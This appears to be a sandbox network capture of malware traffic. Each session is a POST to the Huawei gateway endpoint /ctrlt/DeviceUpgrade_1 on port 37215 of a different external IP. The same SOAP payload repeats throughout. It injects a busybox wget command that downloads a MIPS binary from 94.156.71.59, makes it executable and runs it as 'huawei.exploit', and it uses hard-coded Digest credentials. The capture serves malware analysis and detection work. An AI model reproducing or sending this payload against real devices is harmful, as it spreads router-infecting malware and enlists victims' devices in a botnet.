                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            788192.168.2.1335570156.180.47.21737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.771027088 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            789192.168.2.1343048156.186.79.15637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.772411108 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            790192.168.2.1360466156.151.233.25037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.773931026 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            791192.168.2.1339138156.179.59.10137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.774996042 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            792192.168.2.1335870197.39.173.11937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.775919914 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            793192.168.2.1346860197.45.254.18037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.776905060 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            794192.168.2.133601641.186.142.10337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.778187990 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            795192.168.2.1339560197.254.151.21637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.779347897 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            796192.168.2.135734041.177.168.25037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.780766010 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            797192.168.2.1339322156.207.139.1637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.781625032 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 